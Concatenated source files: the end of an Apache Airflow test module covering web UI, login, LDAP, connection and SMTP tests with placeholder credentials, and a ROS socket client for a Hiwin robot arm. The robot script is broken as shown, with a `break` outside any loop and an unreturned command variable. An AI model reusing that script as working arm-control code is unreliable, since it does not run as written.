response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_partial(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_functool_partial&dag_id=test_task_view_type_check&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("A function with two args", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_instance(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_instance&dag_id=test_task_view_type_check&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("A __call__ method", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=EXAMPLE_DAG_DEFAULT_DATE,
end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class PasswordUserTest(unittest.TestCase):
def setUp(self):
user = models.User()
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user = PasswordUser(user)
self.password_user.username = "password_test"
@mock.patch('airflow.contrib.auth.backends.password_auth.generate_password_hash')
def test_password_setter(self, mock_gen_pass_hash):
mock_gen_pass_hash.return_value = b"hashed_pass" if six.PY3 else "hashed_pass"
self.password_user.password = "secure_password"
mock_gen_pass_hash.assert_called_with("secure_password", 12)
def test_password_unicode(self):
# In python2.7 no conversion is required back to str
# In python >= 3 the method must convert from bytes to str
self.password_user.password = "secure_password"
self.assertIsInstance(self.password_user.password, str)
def test_password_user_authenticate(self):
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_unicode_user_authenticate(self):
self.password_user.username = u"🐼" # This is a panda
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_authenticate_session(self):
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user.password = 'test_password'
session = Session()
session.add(self.password_user)
session.commit()
query_user = session.query(PasswordUser).filter_by(
username=self.password_user.username).first()
self.assertTrue(query_user.authenticate('test_password'))
session.query(models.User).delete()
session.commit()
session.close()
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except Exception:
pass
configuration.conf.set("ldap", "uri", "ldap://openldap:389")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except Exception:
pass
configuration.conf.set("ldap", "uri", "ldap://openldap:389")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:[email protected]:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:[email protected]:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:[email protected]:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:[email protected]:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None
if six.PY2:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
HiwinRA605_socket_ros_test_20190625190139.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
point_data_flag = True
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
socket_command()
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
s.close()
def socket_command():
while(point_data_flag == True or arm_mode_flag == True or speed_mode_flag == True):
##---------------socket 傳輸手臂命令-----------------
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
return(data)
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
test_core.py
|
# -*- coding: utf-8 -*-
#
